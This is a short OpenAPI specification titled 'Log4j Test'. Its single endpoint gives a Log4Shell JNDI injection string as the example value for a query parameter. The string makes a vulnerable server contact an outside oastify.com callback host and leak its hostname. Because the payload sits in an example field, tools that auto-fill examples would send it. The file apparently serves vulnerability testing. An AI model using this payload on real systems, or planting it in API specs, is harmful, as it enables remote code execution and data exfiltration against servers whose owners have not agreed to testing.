openapi: "3.0.0"
info:
  title: "Log4j Test"
  version: "1.0.0"
paths:
  /vulnerable-endpoint:
    get:
      summary: "Test for Log4j vulnerability"
      operationId: "log4jTest"
      parameters:
        - name: "input"
          in: "query"
          required: true
          schema:
            type: "string"
          example: "${jndi:ldap://${hostName}.zx094dni31qftp8m2oqxxsn4ivomcf04.oastify.com/a}"
      responses:
        '200':
          description: "Successful response"
